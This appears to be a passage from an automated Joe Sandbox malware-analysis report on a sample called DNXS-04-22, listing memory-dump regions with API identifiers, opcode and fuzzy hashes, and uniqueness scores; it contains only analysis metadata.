                                                                • Source File: 00000004.00000002.3785837724.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_e20000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: 346a5c16e5086c6e5286652dcb7ba8b482eb7347c9ca98d528c57ad1f03271c7
                                                                • Instruction ID: c0065c8eb9b09ac58e1d22bbada138603241b75666a4a5d3f0474d13f05d656a
                                                                • Opcode Fuzzy Hash: 346a5c16e5086c6e5286652dcb7ba8b482eb7347c9ca98d528c57ad1f03271c7
                                                                • Instruction Fuzzy Hash: 841103B69043598FDB10DF9AD844BDEFBF5EB88314F10842AD519B7200C3B5A945CFA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1362 e2d358-e2d398 1363 e2d3a0-e2d3cb GetModuleHandleW 1362->1363 1364 e2d39a-e2d39d 1362->1364 1365 e2d3d4-e2d3e8 1363->1365 1366 e2d3cd-e2d3d3 1363->1366 1364->1363 1366->1365
                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00E2D3BE
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3785837724.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_e20000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 6dbd31b351beb960d8dd0e34c463b9694c9c1d37a3b7a9ecb97b958abfb3aee6
                                                                • Instruction ID: 1d3385a0fe608f57797c00ad1b8830b5af20a7b454df96e193fc9cc4d8a2a64f
                                                                • Opcode Fuzzy Hash: 6dbd31b351beb960d8dd0e34c463b9694c9c1d37a3b7a9ecb97b958abfb3aee6
                                                                • Instruction Fuzzy Hash: 8D1110B5C003498FCB10DF9AD844BDEFBF4AB88324F20842AD519B7600C379A545CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • OleInitialize.OLE32(00000000), ref: 00F5418D
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786080895.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_f50000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: Initialize
                                                                • String ID:
                                                                • API String ID: 2538663250-0
                                                                • Opcode ID: 2d7eebb85d2402ccdbb6ab4afe9594465cbe7366003b18784371f995744615e8
                                                                • Instruction ID: 91d55c46b767abc12c35344d0e6bbd68f931012ea2378930d3499b1f3703e7ca
                                                                • Opcode Fuzzy Hash: 2d7eebb85d2402ccdbb6ab4afe9594465cbe7366003b18784371f995744615e8
                                                                • Instruction Fuzzy Hash: 561115B59007498FDB20DF9AD444B9EFBF8EB58324F208419D518A7200C375A984CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: -)1#
                                                                • API String ID: 0-1789991113
                                                                • Opcode ID: a507b82f59850099ffedf00b3a56cae70a28e02adaf49a72230951ea7045d968
                                                                • Instruction ID: 0eb1cc19fc8acf8e85cb0e75174eee07df68be31c1abb91355f784c892c48168
                                                                • Opcode Fuzzy Hash: a507b82f59850099ffedf00b3a56cae70a28e02adaf49a72230951ea7045d968
                                                                • Instruction Fuzzy Hash: BD219379A00209CBEB14EBA8C1156DEBBB2AF44708F30841EC506FBB41CB75DE44CBA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 27b586308c3003a2b508000a4f96c42b51eb81f06d3d64c4668b4c7a302aeec4
                                                                • Instruction ID: a8ee3bf93647ac657862197fc9dfa31f3f50f627d6ad12a082fb4d78bef5f34f
                                                                • Opcode Fuzzy Hash: 27b586308c3003a2b508000a4f96c42b51eb81f06d3d64c4668b4c7a302aeec4
                                                                • Instruction Fuzzy Hash: 12521278A00218CFFB15DBE4D860B9EBB76EF89700F1080A9D10AAB355DF359E859F51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ccebfcbeb2684d1af29a80fdd4aa338c15dd92389f0ec52cbccb3862df2c6cef
                                                                • Instruction ID: 95bd18b16f5ddf98de07f85ffda52627588ba29dc290ec13ca92350f4370a962
                                                                • Opcode Fuzzy Hash: ccebfcbeb2684d1af29a80fdd4aa338c15dd92389f0ec52cbccb3862df2c6cef
                                                                • Instruction Fuzzy Hash: 58124938A00219DFCB15CFA9D984A9EBBF6BF88314F648599E849DB261D730ED41CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2debf5eec765a1a88ffda4db31be8862c2d07683c8d6d287d00eacbaa7c01554
                                                                • Instruction ID: 41ced4f2d55df9004ce094e07f969f8195f6ba6945944085a102b403128c1e04
                                                                • Opcode Fuzzy Hash: 2debf5eec765a1a88ffda4db31be8862c2d07683c8d6d287d00eacbaa7c01554
                                                                • Instruction Fuzzy Hash: 25227978A00219CFDB54EF64E894B9DBBB2FF88305F1085A5D909A73A9DB305D46CF41
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 48d3976fee03264f1889e7248bc735f9531acdf94789779da5cd59d69826a6f5
                                                                • Instruction ID: bc442a6f69942d27a812dfe48e792925f26bb26b1bf6d0d1bb85000ecc66fe96
                                                                • Opcode Fuzzy Hash: 48d3976fee03264f1889e7248bc735f9531acdf94789779da5cd59d69826a6f5
                                                                • Instruction Fuzzy Hash: 1DF13179A00619CFDB08CF68D584AADBBF6FF88714B268059E419EB361DB35EC41CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 00c461839266462ab0de6f6290def437544b3b91c7e0a6e35484d3bc8e895c60
                                                                • Instruction ID: a8e36a5ba25ea9a4eb4b826f76f3d9fd8269e937358ffe26dac8034caa452c8e
                                                                • Opcode Fuzzy Hash: 00c461839266462ab0de6f6290def437544b3b91c7e0a6e35484d3bc8e895c60
                                                                • Instruction Fuzzy Hash: 11227878A00219CFDB54EF64E894B9DBBB2FF88305F1085A5D909A73A9DB306D46CF41
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f386a4d3a4097c57e02998e443c7f760e877e5cd97d721a9d01cb56d81b67145
                                                                • Instruction ID: 54dc52e0c68d35b6435c76dd0422c538755332d7349da18cb72eef02724ed28f
                                                                • Opcode Fuzzy Hash: f386a4d3a4097c57e02998e443c7f760e877e5cd97d721a9d01cb56d81b67145
                                                                • Instruction Fuzzy Hash: F1B1707C785205CFEB1A9A28D958B393796EF85748F2544AEE106CF3A1EB35CC42C742
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3ea9b97af8d57d50284267b566ba0ab350ca40d7e3d31ca26650b2a1328b6de6
                                                                • Instruction ID: d58a409f5219c7928f66308d96906963d45a18301d6d87175ca68f87d7beec49
                                                                • Opcode Fuzzy Hash: 3ea9b97af8d57d50284267b566ba0ab350ca40d7e3d31ca26650b2a1328b6de6
                                                                • Instruction Fuzzy Hash: 5191BD38704204CFDF199F24D858B2E7BA6EF89215F64896CE44ADB381DB78EC41CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e60ae1ead04af1cd8ff0e87e4858e838d497cbaef67d13933cd215b3e9672917
                                                                • Instruction ID: d9191754c4f5765eebb8279292260ce1eaae48ef87e673060336444fe856f7e9
                                                                • Opcode Fuzzy Hash: e60ae1ead04af1cd8ff0e87e4858e838d497cbaef67d13933cd215b3e9672917
                                                                • Instruction Fuzzy Hash: 7381717CA00205CFDF14CFA9C484AAAB7B2BF89208BA4816DD509EB365D735F841CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6d6b117f6ea84f6a643f48506582f0b6d2c89f9bf9d1a306ab8f2d14cd0074e3
                                                                • Instruction ID: cb68f920deb3c7e6710be9aae3bd09827f60cff76f0301afac1fd56a1dbd2fbe
                                                                • Opcode Fuzzy Hash: 6d6b117f6ea84f6a643f48506582f0b6d2c89f9bf9d1a306ab8f2d14cd0074e3
                                                                • Instruction Fuzzy Hash: 2771F93C7002058FCB55DF29C498AADBBEAAF49714B2544A9E41ACB3B1DB71DC41CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 16e7151250999e0ed8cc2d07f4e9e592c5182a45af4624417b42500b492c5d06
                                                                • Instruction ID: 687110a60b885569ff5ebc30177871f9000f743548dce5e5fa7671c88be1c23e
                                                                • Opcode Fuzzy Hash: 16e7151250999e0ed8cc2d07f4e9e592c5182a45af4624417b42500b492c5d06
                                                                • Instruction Fuzzy Hash: 6F51B1B88A5352CFDB103B20B9ED12A7BB8FB1F3273056C04E41E89499DB3540A9CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: eb74869741437d7d49bf663618dd27375fa7f2c60aa20259a8980c8ea4cbdbc7
                                                                • Instruction ID: b58361d46381d0e55b797e5f094023e0b81cc9aef1a158e581d86a041f4cb20c
                                                                • Opcode Fuzzy Hash: eb74869741437d7d49bf663618dd27375fa7f2c60aa20259a8980c8ea4cbdbc7
                                                                • Instruction Fuzzy Hash: 4C51ADB88A5356CFDB103F20B9ED12A7BB8FB1F7237417C00A41E89499DB3550A8CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0c1dd3b66a9436fb77165f86610b586ab5d314fd83fd508cd151e4af99145ef3
                                                                • Instruction ID: 7f83b81508c6ba45e253656bbfb42b34f52f6e745c3f340ab6e860a917ce79e2
                                                                • Opcode Fuzzy Hash: 0c1dd3b66a9436fb77165f86610b586ab5d314fd83fd508cd151e4af99145ef3
                                                                • Instruction Fuzzy Hash: F551E678E01208CFDB04EFA9D985A9DFBF2FF89300F249529E409BB254DB349946CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b4a66add7b804099ed32401e581ef2c19ab991f38edb23f1735ca1aa42a81f9e
                                                                • Instruction ID: f4a9bb2dc59550750e232ea4f6ffcf7db4ce7f23db67f234c2e30a22dd4bed20
                                                                • Opcode Fuzzy Hash: b4a66add7b804099ed32401e581ef2c19ab991f38edb23f1735ca1aa42a81f9e
                                                                • Instruction Fuzzy Hash: 52511378D01318CFEB14DFA5D8946AEBBB2FF88301F608129D80AAB395DB355946DF40
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4970ac6b43dd2330a402afd8aa4d0f9b86147148970e801ea54e2ad98597b5ff
                                                                • Instruction ID: 1a63864617b6db011bea234fa7c618cf5f20f5f91681a15da63e725fcc90976a
                                                                • Opcode Fuzzy Hash: 4970ac6b43dd2330a402afd8aa4d0f9b86147148970e801ea54e2ad98597b5ff
                                                                • Instruction Fuzzy Hash: D3519174E11208DFDB44DFAAD9849DDBBF2BF89300F248169E409AB364DB31A901CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f0f9867afbe04604dd908942a60820fd0e748c2de49e6707631f783c4ed2c47b
                                                                • Instruction ID: ae91204cab8bb4cdfaf36e193aa429c5279f6bcdd38e03cb7c080bb6ac479a80
                                                                • Opcode Fuzzy Hash: f0f9867afbe04604dd908942a60820fd0e748c2de49e6707631f783c4ed2c47b
                                                                • Instruction Fuzzy Hash: 6F518478E01208DFCB48DFA9D59499DBBB2FF89311B209469E805AB364DB31AD42CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7abe060050fe599f1cc4b04f341bbdb8fad7224800ad8626deb0cf74d6407bbe
                                                                • Instruction ID: 92508cf6ccdf329407fe29f9078f5e5f3200e0c40c39c217373bb1b7ba16cc81
                                                                • Opcode Fuzzy Hash: 7abe060050fe599f1cc4b04f341bbdb8fad7224800ad8626deb0cf74d6407bbe
                                                                • Instruction Fuzzy Hash: FF41EF39B002089FDB099F75D8546AEBBB6FFC9611F248469E506EB390DF359C02C7A0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2c520fb654ce7ac838ec8ada0c70602f3df6578453569145c130cea829b6c923
                                                                • Instruction ID: 35f10f3832ce14cf9dd6e7e6aa2d06f03de77ca2388f4c2d9946034eb9a8f05d
                                                                • Opcode Fuzzy Hash: 2c520fb654ce7ac838ec8ada0c70602f3df6578453569145c130cea829b6c923
                                                                • Instruction Fuzzy Hash: C341BE3DA04259DFDF15CFA5C884AAEBBB2FF49314F108199E805DB2A5D334E910CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c4194d2c224d25625b98d7ee9e15d820f67763ea044ea7323f7e4e688f9c42a3
                                                                • Instruction ID: d49edfe51b4b3cb1a66061fafb499d460b5923660e91b19abee4c2453947e30c
                                                                • Opcode Fuzzy Hash: c4194d2c224d25625b98d7ee9e15d820f67763ea044ea7323f7e4e688f9c42a3
                                                                • Instruction Fuzzy Hash: C141DF38A04218DFDB118F64C944BAABBBAEF84304F14847EE409DB291E774D945CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 26762900bcf7bc6cbf9fe50681f7dce55bfdeb90e19f3893389fab287be487be
                                                                • Instruction ID: 8fcbeef4e494a4591567d03a6236fe059a1d9aaef3a2a39c2b0b6b7d02000651
                                                                • Opcode Fuzzy Hash: 26762900bcf7bc6cbf9fe50681f7dce55bfdeb90e19f3893389fab287be487be
                                                                • Instruction Fuzzy Hash: 0541F27CD04208CBDB18DFA8D4807ADBBB2BB49305F20912AE419E7394D775D852CF55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 75f229fa3bab7996fedc730fb35bc5649c3677cb07fbfdeb3ec9cf77e192204f
                                                                • Instruction ID: c12b1aaa7ee929bf65cf880477ce0a62a4dd3fb3c29f6371b8519b75ca7019f5
                                                                • Opcode Fuzzy Hash: 75f229fa3bab7996fedc730fb35bc5649c3677cb07fbfdeb3ec9cf77e192204f
                                                                • Instruction Fuzzy Hash: C531F83DB003288BDF195AA9989437EA6E6ABC4215F38C47DD80AD7380DF74CC46D7A1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2c81c840fcba719a66771707ad2416157d507a98b21614c5e215de22f91001ac
                                                                • Instruction ID: c3649a01b3e41328a6480ec153f4e07fad13f0e7d1192af2771a2ae86ad7528f
                                                                • Opcode Fuzzy Hash: 2c81c840fcba719a66771707ad2416157d507a98b21614c5e215de22f91001ac
                                                                • Instruction Fuzzy Hash: 2341EFB8D01208CFDB18DFA8D580AEDB7B2BB49315F20912AE419E7394D735E852CF54
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 106f163c702e1beb386051685de1665c66dc65e66852c712eaee83acbe730d98
                                                                • Instruction ID: dccad97c4d3241dac20a963539bb891f7684e04e565bb94756f0d2b6f00236e9
                                                                • Opcode Fuzzy Hash: 106f163c702e1beb386051685de1665c66dc65e66852c712eaee83acbe730d98
                                                                • Instruction Fuzzy Hash: 693124B8D002088BDB18EFA9D5846EEF7F2BB89305F24D129D418B7354DB319846CF95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 77be0ad1b897e14007fc8ece20fa709953ecdc075f94abd79d2d5adafc87b485
                                                                • Instruction ID: 3ab637846d773dcd80c3b8083834fa8e095ccfd2e80d3ba9ffa25a16b79ca472
                                                                • Opcode Fuzzy Hash: 77be0ad1b897e14007fc8ece20fa709953ecdc075f94abd79d2d5adafc87b485
                                                                • Instruction Fuzzy Hash: B631A07D70010AAFCF05AF64D854AAF7BA2FB88714F104418FA0ACB280CB75CD61DBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3e87fb4feb8c711ae844dea403852fd792b24ea51b495d67ca6b497a13bf335a
                                                                • Instruction ID: a33372184d6bda781a379d501d7131fbf3493f933a8c1c801b5c237090af4dd5
                                                                • Opcode Fuzzy Hash: 3e87fb4feb8c711ae844dea403852fd792b24ea51b495d67ca6b497a13bf335a
                                                                • Instruction Fuzzy Hash: 8521D63C7082118BEF1556399894A79A79AEFC8919724443DDA06CB391EF35CC43EBC0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6d0c7e1bf3b773664a1c9e4fa109f99564f085ed7835dbb6e1dee15ea3cb2b77
                                                                • Instruction ID: 6ac7eef0d31b7bbab9191811d734bc5655bdbd5718a8ea81b029b75ba75a2c6c
                                                                • Opcode Fuzzy Hash: 6d0c7e1bf3b773664a1c9e4fa109f99564f085ed7835dbb6e1dee15ea3cb2b77
                                                                • Instruction Fuzzy Hash: AB31C478A405098FCB08CF69C8859AEFBB6FF89715B258158E525D73A1DB30DC06CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786290310.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_125d000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1388d3ce9c9e19a46170d8675fb6681cec8a290d5e0e26f3ec71bb868897eb42
                                                                • Instruction ID: 360d0f28224d63a6b74e55e4cc0f6d0c594cb392324cda9e14314aac78a91457
                                                                • Opcode Fuzzy Hash: 1388d3ce9c9e19a46170d8675fb6681cec8a290d5e0e26f3ec71bb868897eb42
                                                                • Instruction Fuzzy Hash: 86314F7550E3C49FC703CB64C9A0711BF71AF47214F1985DBD9898F2A3C27A980ACB62
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9ec6658e9cabefbe2cb921f6185e766e4f90e83483e9740ea01f14bcc6453d62
                                                                • Instruction ID: 7ace8e478b9170789205357592517d1925f2bc5aa0c7c332bcb0d74535c04759
                                                                • Opcode Fuzzy Hash: 9ec6658e9cabefbe2cb921f6185e766e4f90e83483e9740ea01f14bcc6453d62
                                                                • Instruction Fuzzy Hash: AA21A43C7082158BEF155639989477AB68ADFC8A19B24443CDA06CB394EF75CC42EBC4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 49715d4f509eb9490c58a80ef9e4612130830e34d23430d9d392e110baefe0da
                                                                • Instruction ID: a4bf2c5ef99c58c2efa8255339dd88ce01b0eba5e9c5eef204d5ec58151db105
                                                                • Opcode Fuzzy Hash: 49715d4f509eb9490c58a80ef9e4612130830e34d23430d9d392e110baefe0da
                                                                • Instruction Fuzzy Hash: 3521A479A00106DFCF14DB24C840AAE77A5EB89350F20C41EED09DB394DB31EE4ACB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
